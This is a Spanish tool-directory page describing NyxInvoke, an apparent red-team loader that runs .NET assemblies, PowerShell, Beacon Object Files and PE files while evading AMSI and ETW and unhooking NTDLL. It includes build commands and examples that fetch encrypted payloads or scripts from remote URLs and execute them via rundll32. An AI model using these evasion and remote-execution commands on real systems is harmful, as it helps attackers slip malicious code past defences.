Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
NyxInvoke — NyxInvoke es una herramienta CLI de Rust para ejecutar ensamblados .NET, PowerShell y BOFs con funciones de AMSI sin parches y bypass de ETW. con compatibilidad con compilación dual | Kitploit
Herramientas/GitHubGitHub/blacksnufkin/nyxinvoke
ExplotaciónEvasión de IDS/IPSShellcodePost-ExplotaciónPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubblacksnufkin/nyxinvoke

NyxInvoke

NyxInvoke es una herramienta CLI de Rust para ejecutar ensamblados .NET, PowerShell y BOFs con funciones de AMSI sin parches y bypass de ETW. con compatibilidad con compilación dual

243301hace 1 añoRevisado por Kitploit
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

NyxInvoke

NyxInvoke es una herramienta versátil basada en Rust diseñada para ejecutar ensamblados .NET, comandos/scripts de PowerShell, Beacon Object Files (BOFs) y archivos PE, con capacidades integradas de desenganchado de Ntdll (Ntdll Unhooking) y evasión sin parches de AMSI y ETW. Puede compilarse como ejecutable independiente o como DLL.

Características

  • Ejecutar ensamblados .NET
  • Ejecutar comandos o scripts de PowerShell
  • Cargar y ejecutar Beacon Object Files (BOFs)
  • Cargar y ejecutar archivos PE (EXEs)
  • Evasión integrada sin parches de AMSI (Anti-Malware Scan Interface)
  • Evasión integrada sin parches de ETW (Event Tracing for Windows)
  • Desenganchado integrado de NTDLL sin activar la devolución de llamada "PspCreateProcessNotifyRoutine"
  • Compatibilidad con cargas útiles cifradas mediante descifrado AES
  • Opciones de entrada flexibles: archivos locales, URLs o datos compilados
  • Compilación dual: se puede compilar como ejecutable o como DLL

Compilación

NyxInvoke puede compilarse como ejecutable o como DLL. Utilice los siguientes comandos:

Ejecutable

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features exe --bin NyxInvoke

DLL

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features dll --lib

Para incluir datos CLR, BOF o PE compilados, añada las características correspondientes:

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=exe,compiled_clr,compiled_bof,compiled_pe --bin NyxInvoke

o

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=dll,compiled_clr,compiled_bof,compiled_pe --lib

Uso

Modo Ejecutable

El ejecutable admite tres modos principales de operación:

  1. Modo CLR (ejecución de ensamblados .NET)
  2. Modo PowerShell
  3. Modo BOF (ejecución de Beacon Object Files)
  4. Modo PE (ejecución de archivos PE)

Sintaxis general

root@kitploit:~
NyxInvoke.exe <mode> [OPTIONS]

Donde <mode> es uno de: clr, ps, bof o pe.

Modo DLL

Cuando se compila como DLL, NyxInvoke puede ejecutarse mediante rundll32. La sintaxis es:

root@kitploit:~
rundll32.exe NyxInvoke.dll,NyxInvoke <mode> [OPTIONS]

Opciones específicas por modo

  1. Modo CLR:
root@kitploit:~
Execute Common Language Runtime (CLR) assemblies

Usage: NyxInvoke.exe clr [OPTIONS]

Options:
  -a, --args <ARGS>...            Arguments to pass to the assembly
  -b, --base <URL_OR_PATH>        Base URL or path for resources
  -k, --key <KEY_FILE>            Path to the encryption key file
  -i, --iv <IV_FILE>              Path to the initialization vector (IV) file
  -f, --assembly <ASSEMBLY_FILE>  Path or URL to the encrypted assembly file to execute
  -u, --unencrypted               Whether the assembly is unencrypted (default is encrypted)
  -h, --help                      Print help (see more with '--help')

Example: NyxInvoke.exe clr --assembly payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. Modo BOF:
root@kitploit:~
Execute Beacon Object Files (BOF)

Usage: NyxInvoke.exe bof [OPTIONS]

Options:
  -a, --args <ARGS>...      Arguments to pass to the BOF
  -b, --base <URL_OR_PATH>  Base URL or path for resources
  -k, --key <KEY_FILE>      Path to the encryption key file
  -i, --iv <IV_FILE>        Path to the initialization vector (IV) file
  -f, --bof <BOF_FILE>      Path or URL to the encrypted BOF file to execute
  -u, --unencrypted         Whether the BOF is unencrypted (default is encrypted)
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe bof --bof payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. Modo PE:
root@kitploit:~
Execute Portable Executable (PE) files

Usage: NyxInvoke.exe pe [OPTIONS]

Options:
  -a, --args <ARGS>...      Arguments to pass to the PE
  -b, --base <URL_OR_PATH>  Base URL or path for resources
  -k, --key <KEY_FILE>      Path to the encryption key file
  -i, --iv <IV_FILE>        Path to the initialization vector (IV) file
  -f, --pe <PE_FILE>        Path or URL to the encrypted PE file to execute
  -u, --unencrypted         Whether the PE is unencrypted (default is encrypted)
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe pe --pe payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. Modo PowerShell:
root@kitploit:~
Execute PowerShell commands or scripts

Usage: NyxInvoke.exe ps [OPTIONS]

Options:
  -c, --command <PS_COMMAND>  PowerShell command to execute
  -s, --script <PS_SCRIPT>    Path or URL to the PowerShell script to execute
  -h, --help                  Print help (see more with '--help')

Examples:
NyxInvoke.exe ps --command "Get-Process"
NyxInvoke.exe ps --script script.ps1

Ejemplos

Modo Ejecutable

  1. Modo CLR (ejecución remota):

    root@kitploit:~
    NyxInvoke.exe clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
    
  2. Modo PowerShell (ejecución de script):

    root@kitploit:~
    NyxInvoke.exe ps --script C:\path\to\script.ps1
    
  3. Modo BOF (ejecución local):

    root@kitploit:~
    NyxInvoke.exe bof --key C:\path\to\bof_aes.key --iv C:\path\to\bof_aes.iv --bof C:\path\to\bof_data.enc --args "str=argument1" "int=42"
    
  4. Modo PE (ejecución compilada):

    root@kitploit:~
    NyxInvoke.exe pe --args arg1
    

Modo DLL

  1. Modo CLR (ejecución remota):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
    
  2. Modo PowerShell (ejecución directa de comandos):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke ps --command "Get-Process | Select-Object Name, ID"
    
  3. Modo BOF (ejecución compilada):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke bof --args "str=argument1" "int=42"
    
  4. Modo PE (ejecución local sin cifrar):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke pe -u --pe C:\path\to\pe.exe --args arg1 arg2
    

Recursos de prueba

En el directorio resources, encontrará varios archivos para probar la funcionalidad de NyxInvoke:

  1. Ensamblado CLR cifrado (Seatbelt):

    • Archivo: clr_data.enc
    • Descripción: una versión cifrada de la herramienta Seatbelt, un proyecto de C# para recopilar información del sistema.
    • Ejemplo de uso:
      root@kitploit:~
      NyxInvoke.exe clr --key resources/clr_aes.key --iv resources/clr_aes.iv --assembly resources/clr_data.enc --args AntiVirus
      
  2. BOF cifrado (listado de directorios):

    • Archivo: bof_data.enc
    • Descripción: un Beacon Object File cifrado que lista los permisos de usuario del archivo especificado; se admiten comodines.
    • Ejemplo de uso:
      root@kitploit:~
      NyxInvoke.exe bof --key resources/bof_aes.key --iv resources/bof_aes.iv --bof resources/bof_data.enc --args "wstr=C:\Windows\system32\cmd.exe"
      
  3. PE cifrado (cuadro de mensaje):

    • Archivo: pe_data.enc
    • Descripción: un archivo PE cifrado que muestra un cuadro de mensaje.
    • Ejemplo de uso:
      root@kitploit:~
      NyxInvoke.exe pe
      
  4. PowerShell (cuadro de mensaje):

    • Archivo: ps.ps1
    • Descripción: un script de PowerShell que muestra un cuadro de mensaje.
    • Ejemplo de uso:
      root@kitploit:~
      NyxInvoke.exe ps -s http://example.com/ps.ps1
      

Capturas de pantalla

  • Ejecución de CLR compilado como DLL

Screenshot 2024-09-18 123147

  • Ejecución remota de BOF (EXE)

Screenshot 2024-09-18 123410

  • Ejecución de EXE compilado como DLL

pe

  • Ejecución de script de PowerShell (DLL)

Screenshot 2024-09-18 123547

Aviso legal

Esta herramienta es solo para fines educativos y de pruebas autorizadas. Asegúrese de tener los permisos adecuados antes de usarla en cualquier entorno.

Créditos

  • @yamakadi por el proyecto clroxide
  • @hakaioffsec por el proyecto coffee
Descargar herramienta